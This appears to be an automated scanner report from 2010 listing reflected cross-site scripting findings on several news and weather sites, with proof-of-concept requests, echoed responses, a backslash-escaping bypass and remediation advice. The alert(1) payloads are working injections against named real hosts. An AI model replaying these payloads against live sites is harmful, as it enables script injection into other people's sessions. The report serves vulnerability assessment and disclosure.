GET /sjm/db_101051/contentdetail.htm?contentguid=NxA2JPFC&detailindex=0&pn=0&ps=5&ab82a"><script>alert(1)</script>78ccedf2046=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.62. http://m.mercurynews.com/sjm/db_101051_index.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101051_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9942"><script>alert(1)</script>80b2236ef24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101051_index.htm?f9942"><script>alert(1)</script>80b2236ef24=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.63. http://m.mercurynews.com/sjm/db_12120_index.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_12120_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ea20"><script>alert(1)</script>ecbcbb193ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_12120_index.htm?9ea20"><script>alert(1)</script>ecbcbb193ec=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.64. http://m.mercurynews.com/sjm/index.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43e5"><script>alert(1)</script>e38bbf29b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/index.htm?c43e5"><script>alert(1)</script>e38bbf29b2=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2df9c"%3balert(1)//819d7381225 was submitted in the lang parameter. This input was echoed as 2df9c";alert(1)//819d7381225 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng2df9c"%3balert(1)//819d7381225&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:16:54 GMT Server: PWS/1.7.1.1 X-Px: ms dal-lv3-n3 ( dal-lv3-n21), ms dal-lv3-n21 ( origin>CONN) Cache-Control: max-age=3240 Expires: Wed, 08 Dec 2010 01:10:54 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... Type; return ret; }
The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e5df"%3balert(1)//4890edfd2c was submitted in the logo parameter. This input was echoed as 5e5df";alert(1)//4890edfd2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=15e5df"%3balert(1)//4890edfd2c&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:15:16 GMT Server: PWS/1.7.1.1 X-Px: ms dal-lv3-n3 ( dal-lv3-n10), ms dal-lv3-n10 ( origin>CONN) Cache-Control: max-age=2760 Expires: Wed, 08 Dec 2010 01:01:16 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3911
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=15e5df";alert(1)//4890edfd2c&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=15e5df";ale ...[SNIP]...
The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45f58"%3balert(1)//c3b68db3e85 was submitted in the metric parameter. This input was echoed as 45f58";alert(1)//c3b68db3e85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=045f58"%3balert(1)//c3b68db3e85&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:17:58 GMT Server: PWS/1.7.1.1 X-Px: ms dal-lv3-n3 ( dal-lv3-n31), ms dal-lv3-n31 ( origin>CONN) Cache-Control: max-age=3480 Expires: Wed, 08 Dec 2010 01:15:58 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... edAttrs["type"] = mimeType; return ret; }
The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7461a"%3balert(1)//8118313683 was submitted in the partner parameter. This input was echoed as 7461a";alert(1)//8118313683 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather7461a"%3balert(1)//8118313683&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:14:39 GMT Server: PWS/1.7.1.1 X-Px: ms dal-lv3-n3 ( dal-lv3-n18), ms dal-lv3-n18 ( origin>CONN) Cache-Control: max-age=3240 Expires: Wed, 08 Dec 2010 01:08:39 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3911
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... nversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather7461a";alert(1)//8118313683&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather7461a";ale ...[SNIP]...
The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47ef2"%3balert(1)//ccf56ab61e2 was submitted in the tStyle parameter. This input was echoed as 47ef2";alert(1)//ccf56ab61e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal47ef2"%3balert(1)//ccf56ab61e2&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:14:57 GMT Server: PWS/1.7.1.1 X-Px: ms dal-lv3-n3 ( dal-lv3-n26), ms dal-lv3-n26 ( origin>CONN) Cache-Control: max-age=3480 Expires: Wed, 08 Dec 2010 01:12:58 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal47ef2";alert(1)//ccf56ab61e2&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal47ef2";ale ...[SNIP]...
The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94a41"%3balert(1)//31436bfb76f was submitted in the target parameter. This input was echoed as 94a41";alert(1)//31436bfb76f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self94a41"%3balert(1)//31436bfb76f HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:18:28 GMT Server: PWS/1.7.1.1 X-Px: ms dal-lv3-n3 ( dal-lv3-n24), ms dal-lv3-n24 ( origin>CONN) Cache-Control: max-age=3480 Expires: Wed, 08 Dec 2010 01:16:28 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... "] = mimeType; return ret; }
The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3e53"%3balert(1)//b6f49f11fc was submitted in the theme parameter. This input was echoed as e3e53";alert(1)//b6f49f11fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=cloudse3e53"%3balert(1)//b6f49f11fc&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:17:39 GMT Server: PWS/1.7.1.1 X-Px: ms dal-lv3-n3 ( dal-lv3-n19), ms dal-lv3-n19 ( origin>CONN) Cache-Control: max-age=3240 Expires: Wed, 08 Dec 2010 01:11:39 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3911
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ) ret.embedAttrs["type"] = mimeType; return ret; }
The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa00a"%3balert(1)//9f65affc6bd was submitted in the zipcode parameter. This input was echoed as fa00a";alert(1)//9f65affc6bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025fa00a"%3balert(1)//9f65affc6bd&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:16:06 GMT Server: PWS/1.7.1.1 X-Px: ms dal-lv3-n3 ( dal-lv3-n15), ms dal-lv3-n15 ( origin>CONN) Cache-Control: max-age=3120 Expires: Wed, 08 Dec 2010 01:08:07 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... uginsPage; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
The value of the funnelid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 762fa"><script>alert(1)</script>7aa6c6676ce was submitted in the funnelid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /default-js.asp?view=0&funnelid=F180762fa"><script>alert(1)</script>7aa6c6676ce&a=b&siteid=APS&vid=ctt_id=&ctt_adnw=&ctt_ch=&ctt_entity=&ctt_cli=&ctt_kw=&ctt_adid=&ctt_nwtype= HTTP/1.1 Host: news1reports.com Proxy-Connection: keep-alive Referer: http://m.mercurynews.com/cb/473/subscribe.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 32513 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQSATSCTR=LBCNKEOCDLCJMIHPBPGIBDFE; path=/ X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 00:14:33 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
The value of the funnelid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d872'%3balert(1)//fdded8688d4 was submitted in the funnelid parameter. This input was echoed as 5d872';alert(1)//fdded8688d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default-js.asp?view=0&funnelid=F1805d872'%3balert(1)//fdded8688d4&a=b&siteid=APS&vid=ctt_id=&ctt_adnw=&ctt_ch=&ctt_entity=&ctt_cli=&ctt_kw=&ctt_adid=&ctt_nwtype= HTTP/1.1 Host: news1reports.com Proxy-Connection: keep-alive Referer: http://m.mercurynews.com/cb/473/subscribe.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 32363 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQSATSCTR=OBCNKEOCHMCPPNJPHOPBLNIG; path=/ X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 00:14:34 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv ...[SNIP]... cript'>var areYouReallySure = false;var internalLink = false;function areYouSure() {if (!areYouReallySure && !internalLink) {areYouReallySure = true;location.href='http://automaticprofitsystem.com/F1805d872';alert(1)//fdded8688d4/info.asp?fromep=Y';return 'Are you sure you dont want to take advantage of the Automatic Profit System?\n\nDont forget ... this will only be available for a limited time. Since there is a 365 day mone ...[SNIP]...
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e07be\'%3balert(1)//69c8bc07316 was submitted in the version parameter. This input was echoed as e07be\\';alert(1)//69c8bc07316 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /FSI/AllPages.aspx?advid=200177&loc=53824&fsi=14927&version=Mercurye07be\'%3balert(1)//69c8bc07316&facing=false HTTP/1.1 Host: newspaperads.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-326766520-1291762315669;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 08 Dec 2010 01:09:52 GMT Server: Microsoft-IIS/6.0 X-Server-Name: HW3 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]... '; s_az.server = 'newspaperads.mercurynews.com';
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82146\'%3balert(1)//d8c3dcadec7 was submitted in the version parameter. This input was echoed as 82146\\';alert(1)//d8c3dcadec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /FSI/Brands.aspx?advid=200177&loc=53824&fsi=14927&version=Mercury82146\'%3balert(1)//d8c3dcadec7&facing=false HTTP/1.1 Host: newspaperads.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-326766520-1291762315669;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 08 Dec 2010 01:10:00 GMT Server: Microsoft-IIS/6.0 X-Server-Name: HW3 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47097
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <HTML lang="en"> <HEAD>
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7539\'%3balert(1)//87dbe24d64b was submitted in the version parameter. This input was echoed as b7539\\';alert(1)//87dbe24d64b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /FSI/Page.aspx?advid=200177&loc=53824&fsi=14927&facing=false&version=Mercuryb7539\'%3balert(1)//87dbe24d64b HTTP/1.1 Host: newspaperads.mercurynews.com Proxy-Connection: keep-alive Referer: http://ads.yldmgrimg.net/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-326766520-1291762315669; location=53824
Response
HTTP/1.1 200 OK Cache-Control: private Date: Wed, 08 Dec 2010 00:17:05 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Server-Name: HW3 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 48110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]... newspaperads.mercurynews.com';
